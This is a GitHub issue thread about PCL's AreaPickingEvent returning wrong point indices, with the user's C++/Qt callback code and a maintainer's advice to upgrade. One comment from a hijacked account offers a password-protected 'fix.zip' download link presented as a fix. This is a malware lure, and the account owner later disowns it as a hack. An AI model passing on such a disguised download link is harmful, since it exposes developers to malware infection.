### ISSUE TITLE
[visualization] AreaPickingEvent.getPointsIndices() returns wrong indices

### ISSUE THREAD

**Issue by Ru1yi** [PointCloudLibrary/pcl#6119]
**My Environment:**

 - OS: Windows 11
 - Compiler: MSVC2019_64
 - PCL Version 1.12.1
 - Qt 5.15.2

**Problem**

I integrated the areapickingevent under the visualization module in my Qt program, and tried to get the point cloud index of my selected area through getPointsIndices. But after I visualized the resulting point cloud, I found that the point cloud index was wrong.

<img width="609" alt="8a9d95690be3ac89b38d439f3856130" src="https://github.com/user-attachments/assets/74aac544-d625-40f9-a246-849370616336">

The green box in the picture above is the part I selected.

<img width="733" alt="f144d201a00337c93d1b5182146f25e" src="https://github.com/user-attachments/assets/5aa8f3b1-9dae-49dc-a376-81694b7610ce">

The green box in the above picture is the result of the selected point cloud visualization.

**Code**
```
void PCL_test::pp_callback_AreaSelect(const pcl::visualization::AreaPickingEvent& event, void* args)
{
	PCL_test* p = (PCL_test*)args;
	std::vector<int > indices;
	if (event.getPointsIndices(indices) == -1)
		return;

	p->selected_3D_points->clear();

	qDebug() << "Pointcloud area size: " << indices.size() << endl;
	for (int i = 0; i < indices.size(); ++i)
	{
		qDebug() << "Selected point[" << i + 1 << "] indice" << indices[i] << ":" << p->cloudptr->points.at(indices[i]).x << ", " << p->cloudptr->points.at(indices[i]).y << ", " << p->cloudptr->points.at(indices[i]).z << endl;
		p->selected_3D_points->points.push_back(p->cloudptr->points.at(indices[i]));
	}
	//qDebug() << "Select points size: " << p->selected_3D_points->width << "*" << p->selected_3D_points->height << endl;

	//*p->cloudptr = *p->selected_3D_points;
	pcl::visualization::PointCloudColorHandlerCustom<pcl::PointXYZI> cloud_color(p->selected_3D_points, 0, 255, 0);
	p->cloud_viewer->removeShape("pick");
	p->cloud_viewer->addPointCloud(p->selected_3D_points, cloud_color, "pick");
	p->cloud_viewer->setPointCloudRenderingProperties(pcl::visualization::PCL_VISUALIZER_POINT_SIZE, 3, "pick");
	p->ui.qvtkwidget_cloudviewer->update();
}
```

**Additional context**
I found that getPointsIndices does not have any parameters for viewing angle settings, and I don't know what other factors will affect the accuracy of point cloud selection. In addition, I would like to add that I did not see any specific point cloud selection operation instructions in the [official documentation](https://pointclouds.org/documentation/classpcl_1_1visualization_1_1_area_picking_event.html#details), such as "press x first, then use the left mouse button to select, and then press x to visualize the selection results". I hope the official can add more detailed introductions in subsequent updates. Thanks a lot.

**Comment by internet-person** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Ru1yi** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

What is this?

**Comment by internet-person** [comment]
> > Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."
> 
> What is this?

do not open the shit my account just posted, i got hacked.

**Comment by mvieth** [comment]
@internet-person Have you changed all your passwords?

**Comment by mvieth** [comment]
@Ru1yi Can you please try the most recent PCL version instead, 1.14.1? I believe this issue was fixed since 1.12.1

**Comment by internet-person** [comment]
> @internet-person Have you changed all your passwords?

just reset my github, trying to clear up 10 pages of spam comments before i infect anyone else

**Comment by internet-person** [comment]
> > @internet-person Have you changed all your passwords?
> 
> just reset my github, trying to clear up 10 pages of spam comments before i infect anyone else

alright, ive finally nuked the million pages of spam.

if anyone could ask the the curl organization people to unban me, that would be great.

thank you all for avoiding my fate by not biting the worm. god i wish this hadnt happened while i was going to bed.

**Comment by Ru1yi** [comment]
> @Ru1yi Can you please try the most recent PCL version instead, 1.14.1? I believe this issue was fixed since 1.12.1

Do I need to update the versions of MSVC and QT at the same time?

**Comment by mvieth** [comment]
> Do I need to update the versions of MSVC and QT at the same time?

I don't think so. In our CI pipeline, we are still testing Qt 5.12.8, Qt 5.15.3, and Qt 5.15.13 (on Ubuntu). Regarding MSVC I can't say for sure because we are only testing with MSVC 2022, but I don't see a reason why MSVC 2019 shouldn't work as well.

**Comment by Ru1yi** [comment]
> > Do I need to update the versions of MSVC and QT at the same time?
> 
> I don't think so. In our CI pipeline, we are still testing Qt 5.12.8, Qt 5.15.3, and Qt 5.15.13 (on Ubuntu). Regarding MSVC I can't say for sure because we are only testing with MSVC 2022, but I don't see a reason why MSVC 2019 shouldn't work as well.

I installed PCL1.14.1, updated the include and lib folder locations in the VC++ directory, and also changed the Boost lib names in the linker. The program can run normally. When I press x, I can use the left mouse button to select a box, but the indice size I get is 0， the viewer does not display any selected point cloud.

Here is how I bind AreaPickingEvent, is there anything wrong?
``
void PCL_test::pushButton_PickArea_Clicked()
{
	HKL hCurKL = NULL;
	// Force switch to English input method
	hCurKL = GetKeyboardLayout(0);
	LoadKeyboardLayout((LPCSTR)QString("0x0409").utf16(), KLF_ACTIVATE);

	QApplication::processEvents();

	if (is_area_selected == false)
	{
		is_area_selected = true;
		ui.pushButton_PickArea->setText("End Area");
		cloud_viewer->registerAreaPickingCallback(pp_callback_AreaSelect, this);
	}
	else
	{
		is_area_selected = false;
		ui.pushButton_PickArea->setText("Pick Area");
		selected_3D_points.reset(new PointCloudT);
	}
``

**Comment by mvieth** [comment]
https://github.com/PointCloudLibrary/pcl/blob/master/tools/pcd_viewer.cpp has an example of how to use `AreaPickingEvent`

**Comment by Ru1yi** [comment]
> https://github.com/PointCloudLibrary/pcl/blob/master/tools/pcd_viewer.cpp has an example of how to use `AreaPickingEvent`

There is no getCloudNames() method in the AreaPickingEvent class of PCL1.12.1. So I still need to update the PCL version. Thanks a lot anyway. I will try it later.

**Comment by mvieth** [comment]
@Ru1yi What is the status here? Have you tried with the code from pcd_viewer.cpp?
